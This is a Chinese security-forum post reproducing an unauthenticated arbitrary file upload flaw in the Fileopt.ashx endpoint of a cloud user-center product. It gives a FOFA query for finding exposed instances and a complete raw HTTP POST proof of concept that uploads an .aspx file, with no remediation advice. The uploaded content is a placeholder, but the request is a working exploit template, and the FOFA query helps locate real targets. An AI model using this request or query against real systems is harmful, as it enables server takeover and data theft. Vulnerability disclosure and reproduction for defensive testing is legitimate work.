漏洞复现|铜哨云用户中心/Fileopt.ashx存在文件上传漏洞-网络安全论坛-网络安全-阻击者联盟

漏洞复现|铜哨云用户中心/Fileopt.ashx存在文件上传漏洞

漏洞描述

哨云用户中心的FileOpt.ashx接口存在文件上传漏洞,这是一个未经身份验证的前台任意文件上传漏洞。该接口未对上传文件的类型、来源等进行严格验证,攻击者可构造恶意请求,上传包含恶意代码的文件(如.aspx等可执行文件),文件会被保存到服务器指定路径并可被访问执行,从而导致服务器被控制或数据泄露等安全风险。

资产信息

fofa:(body="铜哨云用户中心") || icon_hash="1450750287"

d2b5ca33bd20251221083834

漏洞复现

d2b5ca33bd20251221083848

POC

POST /Mobile/FrontInterface/Functions/Handles/File/Fileopt.ashx HTTP/1.1
Host: 
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryf8KikBFWOrwSf2eA
Content-Length: 265

------WebKitFormBoundaryf8KikBFWOrwSf2eA
Content-Disposition: form-data; name="File";filename="1.aspx"

111111
------WebKitFormBoundaryf8KikBFWOrwSf2eA
Content-Disposition: form-data; name="session"

1231221
------WebKitFormBoundaryf8KikBFWOrwSf2eA--

 

请登录后发表评论

    没有回复内容